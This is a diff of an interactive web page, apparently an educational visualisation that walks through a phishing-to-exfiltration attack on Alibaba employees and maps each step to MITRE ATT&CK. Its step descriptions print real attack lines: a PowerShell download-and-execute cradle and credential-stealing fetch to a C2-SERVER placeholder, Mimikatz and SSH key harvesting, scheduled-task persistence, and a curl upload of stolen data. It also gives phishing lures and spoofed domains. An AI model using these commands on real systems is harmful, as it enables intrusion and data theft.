 
 
160
  </div>
 
 
 
 
 
161
 
162
+ <!-- Exfiltrated Data -->
163
+ <div id="exfiltration" class="attack-node absolute left-[85%] top-[65%] bg-green-50 p-4 rounded-lg shadow-sm border-2 border-green-300 w-[160px] text-center hidden">
164
+ <div class="bg-green-100 p-3 rounded-full inline-block mb-2">
165
+ <i class="fas fa-cloud-download-alt text-green-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
166
  </div>
167
+ <h3 class="font-bold text-green-800">Exfiltrated Data</h3>
168
+ <p class="text-xs text-green-600 mt-1">*.sql, *.pem, *.key</p>
169
+ </div>
170
+
171
+ <!-- Attack Flow Arrows (dynamically drawn with JS) -->
172
+ <svg class="absolute inset-0 w-full h-full" id="attack-flow"></svg>
173
+
174
+ <!-- Attack Timeline Controls -->
175
+ <div class="absolute bottom-4 left-0 right-0 flex justify-center">
176
+ <div class="bg-white rounded-lg shadow-md p-4 flex items-center space-x-4">
177
+ <button id="prev-step" class="px-3 py-1 bg-gray-200 rounded-md hover:bg-gray-300">
178
+ <i class="fas fa-chevron-left"></i>
179
+ </button>
180
+ <div class="text-sm font-medium" id="current-step">Step 1: Initial Phishing</div>
181
+ <button id="next-step" class="px-3 py-1 bg-gray-200 rounded-md hover:bg-gray-300">
182
+ <i class="fas fa-chevron-right"></i>
183
+ </button>
184
+ <button id="play-attack" class="px-3 py-1 bg-blue-100 text-blue-700 rounded-md hover:bg-blue-200 ml-4">
185
+ <i class="fas fa-play mr-1"></i> Play Attack
186
+ </button>
187
  </div>
188
+ </div>
189
+
190
+ <!-- Tooltip -->
191
+ <div class="tooltip hidden" id="attack-tooltip"></div>
192
+ </div>
193
+
194
+ <!-- Attack Step Details -->
195
+ <div class="mt-8 bg-white rounded-lg shadow-md p-6">
196
+ <h2 class="text-xl font-bold text-gray-800 mb-4" id="step-title">Step 1: Initial Phishing</h2>
197
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
198
+ <div>
199
+ <h3 class="font-medium text-gray-700 mb-2">Technical Details</h3>
200
+ <div class="bg-gray-50 p-4 rounded-md" id="step-details">
201
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
202
+ <li>Email subjects: "紧急通知:阿里云账号异常登录提醒"</li>
203
+ <li>Body mimics official Alibaba Cloud communications</li>
204
+ <li>Contains malicious attachment or phishing link</li>
205
+ <li>Spoofed sender: security@alibaba-inc.com</li>
206
  </ul>
207
  </div>
208
  </div>
209
+ <div>
210
+ <h3 class="font-medium text-gray-700 mb-2">MITRE ATT&CK Mapping</h3>
211
+ <div class="bg-gray-50 p-4 rounded-md">
212
+ <div class="flex items-center mb-2">
213
+ <span class="bg-blue-100 text-blue-800 text-xs font-medium px-2.5 py-0.5 rounded mr-2">T1566.001</span>
214
+ <span>Spearphishing Attachment</span>
215
+ </div>
216
+ <div class="flex items-center">
217
+ <span class="bg-purple-100 text-purple-800 text-xs font-medium px-2.5 py-0.5 rounded mr-2">T1598</span>
218
+ <span>Phishing for Information</span>
219
+ </div>
 
220
  </div>
221
  </div>
222
  </div>
223
  </div>
224
  </div>
225
 
 
 
 
 
 
 
 
226
  <script>
227
+ // Attack steps data
228
+ const attackSteps = [
229
+ {
230
+ title: "Step 1: Initial Phishing",
231
+ details: `
232
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
233
+ <li>Email subjects: "紧急通知:阿里云账号异常登录提醒" or "内部会议纪要(机密)"</li>
234
+ <li>Body mimics official Alibaba Cloud communications</li>
235
+ <li>Contains malicious attachment or phishing link</li>
236
+ <li>Attachment: 阿里云安全报告_v2023.pdf (malicious macro)</li>
237
+ <li>Phishing URL: https://aliyun-support[.]com/verify</li>
238
+ <li>Spoofed sender: security@alibaba-inc.com</li>
239
+ <li>Typosquatting domain: al1baba-inc[.]com</li>
240
+ </ul>
241
+ `,
242
+ mitre: [
243
+ { id: "T1566.001", name: "Spearphishing Attachment" },
244
+ { id: "T1598", name: "Phishing for Information" }
245
+ ],
246
+ draw: (svg) => {
247
+ // Draw line from attacker to phishing server
248
+ drawLine(svg, "#attacker", "#phishing", "red");
249
+ // Draw line from phishing server to victim
250
+ drawLine(svg, "#phishing", "#victim", "red");
251
+ // Draw line from attacker to malicious doc
252
+ drawLine(svg, "#attacker", "#document", "red");
253
+ // Draw line from malicious doc to victim
254
+ drawLine(svg, "#document", "#victim", "red");
255
+ }
256
+ },
257
+ {
258
+ title: "Step 2: Payload Execution",
259
+ details: `
260
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
261
+ <li>Victim opens malicious document and enables macros</li>
262
+ <li>Macro executes PowerShell payload:</li>
263
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
264
+ powershell IEX (New-Object Net.WebClient).DownloadString('http://C2-SERVER/payload.ps1')
265
+ </div>
266
+ <li>Or victim enters credentials on phishing site</li>
267
+ <li>JavaScript steals credentials:</li>
268
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
269
+ fetch('http://C2-SERVER/steal', {<br>
270
+ &nbsp;&nbsp;method: 'POST',<br>
271
+ &nbsp;&nbsp;body: JSON.stringify({user: username, pass: password})<br>
272
+ });
273
+ </div>
274
+ </ul>
275
+ `,
276
+ mitre: [
277
+ { id: "T1059.001", name: "PowerShell" },
278
+ { id: "T1204.002", name: "Malicious File" }
279
+ ],
280
+ draw: (svg) => {
281
+ // Previous steps
282
+ attackSteps[0].draw(svg);
283
+
284
+ // Highlight victim
285
+ document.querySelector("#victim").classList.add("critical");
286
+
287
+ // Draw line from victim to workstation (compromise)
288
+ drawLine(svg, "#victim", "#workstation", "red", 3);
289
+
290
+ // Draw line from workstation to attacker (C2)
291
+ drawLine(svg, "#workstation", "#attacker", "red", 2, true);
292
+ }
293
+ },
294
+ {
295
+ title: "Step 3: C2 Implantation",
296
+ details: `
297
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
298
+ <li>Cobalt Strike beacon established</li>
299
+ <li>Persistence mechanisms installed:</li>
300
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
301
+ Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br>
302
+ Task: schtasks /create /tn "Windows Update" /tr "C:\Windows\System32\malicious.exe"
303
+ </div>
304
+ <li>C2 configuration:</li>
305
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
306
+ windows/x64/reflective PE<br>
307
+ HTTPS with valid certificate<br>
308
+ Multiple IP rotation via CDN
309
+ </div>
310
+ </ul>
311
+ `,
312
+ mitre: [
313
+ { id: "T1572", name: "Protocol Tunneling" },
314
+ { id: "T1547.001", name: "Registry Run Keys" },
315
+ { id: "T1053", name: "Scheduled Task" }
316
+ ],
317
+ draw: (svg) => {
318
+ // Previous steps
319
+ attackSteps[1].draw(svg);
320
+
321
+ // Highlight workstation as compromised
322
+ document.querySelector("#workstation").classList.remove("critical");
323
+ document.querySelector("#workstation").classList.add("compromised");
324
+
325
+ // Draw ongoing C2 communication
326
+ drawLine(svg, "#workstation", "#attacker", "red", 2, true);
327
+ }
328
+ },
329
+ {
330
+ title: "Step 4: Credential Theft",
331
+ details: `
332
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
333
+ <li>Credential harvesting:</li>
334
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
335
+ Mimikatz !sekurlsa::logonpasswords<br>
336
+ Search C:\Users\*\.ssh\id_rsa<br>
337
+ cmdkey /list
338
+ </div>
339
+ <li>Browser cookie theft:</li>
340
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
341
+ Decrypt Chrome/Edge cookies<br>
342
+ Filter for alibaba-inc.com sessions
343
+ </div>
344
+ <li>SSH key discovery:</li>
345
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
346
+ C:\Users\*\.ssh\id_rsa<br>
347
+ C:\Users\*\.ssh\config
348
+ </div>
349
+ </ul>
350
+ `,
351
+ mitre: [
352
+ { id: "T1555", name: "Credentials from Password Stores" },
353
+ { id: "T1552.001", name: "Credentials In Files" },
354
+ { id: "T1539", name: "Steal Web Session Cookie" }
355
+ ],
356
+ draw: (svg) => {
357
+ // Previous steps
358
+ attackSteps[2].draw(svg);
359
+
360
+ // Draw credential theft to attacker
361
+ drawLine(svg, "#workstation", "#attacker", "red", 3, true);
362
+
363
+ // Add tooltip to show credential flow
364
+ addTooltip("#workstation", "Sending stolen credentials to C2");
365
+ }
366
+ },
367
+ {
368
+ title: "Step 5: Lateral Movement",
369
+ details: `
370
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
371
+ <li>Internal reconnaissance:</li>
372
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
373
+ nmap -sS 10.0.0.0/24<br>
374
+ for ip in {1..254}; do ssh -o ConnectTimeout=1 user@10.0.0.$ip; done
375
+ </div>
376
+ <li>SSH access using stolen credentials:</li>
377
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
378
+ ssh -i id_rsa user@10.0.0.5<br>
379
+ plink.exe -ssh -P 22 -i id_rsa user@10.0.0.6
380
+ </div>
381
+ <li>Browser proxy for internal access:</li>
382
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
383
+ proxychains4 -q -f /path/to/config.txt firefox<br>
384
+ Proxy config: 1.2.3.4:8080
385
+ </div>
386
+ </ul>
387
+ `,
388
+ mitre: [
389
+ { id: "T1021.004", name: "Remote Services: SSH" },
390
+ { id: "T1090", name: "Proxy" },
391
+ { id: "T1018", name: "Remote System Discovery" }
392
+ ],
393
+ draw: (svg) => {
394
+ // Previous steps
395
+ attackSteps[3].draw(svg);
396
+
397
+ // Show compromised SSH server
398
+ document.querySelector("#ssh-server").classList.add("hidden");
399
+ document.querySelector("#compromised-ssh").classList.remove("hidden");
400
+
401
+ // Draw line from workstation to SSH server
402
+ drawLine(svg, "#workstation", "#compromised-ssh", "red", 3);
403
+
404
+ // Add tooltip to show lateral movement
405
+ addTooltip("#compromised-ssh", "Using stolen SSH keys for access");
406
+ }
407
+ },
408
+ {
409
+ title: "Step 6: Data Exfiltration",
410
+ details: `
411
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
412
+ <li>Target files for exfiltration:</li>
413
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
414
+ *.pem, *.key, *.sql, *.db
415
+ </div>
416
+ <li>Data collection methods:</li>
417
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
418
+ Browser JavaScript injection:<br>
419
+ document.querySelectorAll('input[type="password"]')
420
+ </div>
421
+ <li>Exfiltration techniques:</li>
422
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
423
+ split -b 5MB sensitive.tar.gz | curl -X POST -F 'file=@-' http://C2-SERVER/upload
424
+ </div>
425
+ </ul>
426
+ `,
427
+ mitre: [
428
+ { id: "T1041", name: "Exfiltration Over C2 Channel" },
429
+ { id: "T1020", name: "Automated Exfiltration" },
430
+ { id: "T1567", name: "Exfiltration Over Web Service" }
431
+ ],
432
+ draw: (svg) => {
433
+ // Previous steps
434
+ attackSteps[4].draw(svg);
435
+
436
+ // Show exfiltrated data
437
+ document.querySelector("#exfiltration").classList.remove("hidden");
438
+
439
+ // Draw line from database to exfiltration
440
+ drawLine(svg, "#database", "#exfiltration", "green", 3);
441
+
442
+ // Draw line from exfiltration to attacker
443
+ drawLine(svg, "#exfiltration", "#attacker", "green", 3, true);
444
+
445
+ // Add tooltip to show data flow
446
+ addTooltip("#exfiltration", "Sensitive data being exfiltrated to attacker");
447
+ }
448
+ }
449
+ ];
450
+
451
+ // Current step index
452
+ let currentStep = 0;
453
+
454
+ // Draw line between elements
455
+ function drawLine(svg, fromSelector, toSelector, color = "red", width = 2, animate = false) {
456
+ const fromEl = document.querySelector(fromSelector);
457
+ const toEl = document.querySelector(toSelector);
458
+
459
+ if (!fromEl || !toEl) return;
460
+
461
+ const fromRect = fromEl.getBoundingClientRect();
462
+ const toRect = toEl.getBoundingClientRect();
463
+ const svgRect = svg.getBoundingClientRect();
464
+
465
+ const x1 = fromRect.left + fromRect.width/2 - svgRect.left;
466
+ const y1 = fromRect.top + fromRect.height/2 - svgRect.top;
467
+ const x2 = toRect.left + toRect.width/2 - svgRect.left;
468
+ const y2 = toRect.top + toRect.height/2 - svgRect.top;
469
+
470
+ const line = document.createElementNS("http://www.w3.org/2000/svg", "line");
471
+ line.setAttribute("x1", x1);
472
+ line.setAttribute("y1", y1);
473
+ line.setAttribute("x2", x2);
474
+ line.setAttribute("y2", y2);
475
+ line.setAttribute("stroke", color);
476
+ line.setAttribute("stroke-width", width);
477
+ line.setAttribute("stroke-linecap", "round");
478
+
479
+ if (animate) {
480
+ line.classList.add("data-flow");
481
+ }
482
+
483
+ svg.appendChild(line);
484
+ }
485
+
486
+ // Add tooltip to element
487
+ function addTooltip(selector, text) {
488
+ const el = document.querySelector(selector);
489
+ const tooltip = document.getElementById("attack-tooltip");
490
+
491
+ if (!el || !tooltip) return;
492
+
493
+ el.addEventListener("mouseenter", (e) => {
494
+ const rect = el.getBoundingClientRect();
495
+ tooltip.textContent = text;
496
+ tooltip.style.left = `${rect.left + rect.width/2 - 150}px`;
497
+ tooltip.style.top = `${rect.top - 40}px`;
498
+ tooltip.classList.remove("hidden");
499
+ });
500
+
501
+ el.addEventListener("mouseleave", () => {
502
+ tooltip.classList.add("hidden");
503
+ });
504
+ }
505
 
506
+ // Update visualization for current step
507
+ function updateVisualization() {
508
+ const svg = document.getElementById("attack-flow");
509
+ svg.innerHTML = "";
510
+
511
+ // Reset all elements
512
+ document.querySelectorAll(".attack-node").forEach(el => {
513
+ el.classList.remove("critical", "compromised");
514
+ el.classList.remove("hidden");
515
+ });
516
+ document.getElementById("exfiltration").classList.add("hidden");
517
+ document.getElementById("compromised-ssh").classList.add("hidden");
518
+ document.getElementById("ssh-server").classList.remove("hidden");
519
+
520
+ // Draw current step
521
+ attackSteps[currentStep].draw(svg);
522
+
523
+ // Update step info
524
+ document.getElementById("step-title").textContent = attackSteps[currentStep].title;
525
+ document.getElementById("step-details").innerHTML = attackSteps[currentStep].details;
526
+ document.getElementById("current-step").textContent = attackSteps[currentStep].title;
527
+
528
+ // Update MITRE ATT&CK
529
+ const mitreContainer = document.querySelector(".bg-gray-50 > div:last-child");
530
+ mitreContainer.innerHTML = attackSteps[currentStep].mitre.map(item => `
531
+ <div class="flex items-center mb-2">
532
+ <span class="bg-blue-100 text-blue-800 text-xs font-medium px-2.5 py-0.5 rounded mr-2">${item.id}</span>
533
+ <span>${item.name}</span>
534
+ </div>
535
+ `).join("");
536
+ }
537
+
538
+ // Initialize
539
+ document.addEventListener("DOMContentLoaded", () => {
540
+ updateVisualization();
541
+
542
+ // Navigation controls
543
+ document.getElementById("prev-step").addEventListener("click", () => {
544
+ if (currentStep > 0) {
545
+ currentStep--;
546
+ updateVisualization();
547
  }
548
  });
549
+
550
+ document.getElementById("next-step").addEventListener("click", () => {
551
+ if (currentStep < attackSteps.length - 1) {
552
+ currentStep++;
553
+ updateVisualization();
554
+ }
555
+ });
556
+
557
+ // Play attack animation
558
+ document.getElementById("play-attack").addEventListener("click", () => {
559
+ currentStep = 0;
560
+ updateVisualization();
561
+
562
+ let i = 0;
563
+ const interval = setInterval(() => {
564
+ if (i < attackSteps.length - 1) {
565
+ i++;
566
+ currentStep = i;
567
+ updateVisualization();
568
+ } else {
569
+ clearInterval(interval);
570
+ }
571
+ }, 2000);
572
+ });
573
+
574
+ // Add tooltips to all attack nodes
575
+ addTooltip("#attacker", "Attacker controlled infrastructure");
576
+ addTooltip("#phishing", "Phishing server hosting fake login page");
577
+ addTooltip("#document", "Malicious document with embedded macro");
578
+ addTooltip("#victim", "Targeted employee receiving phishing email");
579
+ addTooltip("#workstation", "Compromised workstation with C2 beacon");
580
+ addTooltip("#ssh-server", "Internal SSH server target");
581
+ addTooltip("#compromised-ssh", "Compromised SSH server via stolen keys");
582
+ addTooltip("#database", "Internal database with sensitive information");
583
+ addTooltip("#exfiltration", "Stolen data being sent to attacker");
584
  });
585
  </script>
586
  <p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - 🧬 <a href="https://enzostvs-deepsite.hf.space?remix=capta1n/bas" style="color: #fff;text-decoration: underline;" target="_blank" >Remix</a></p></body>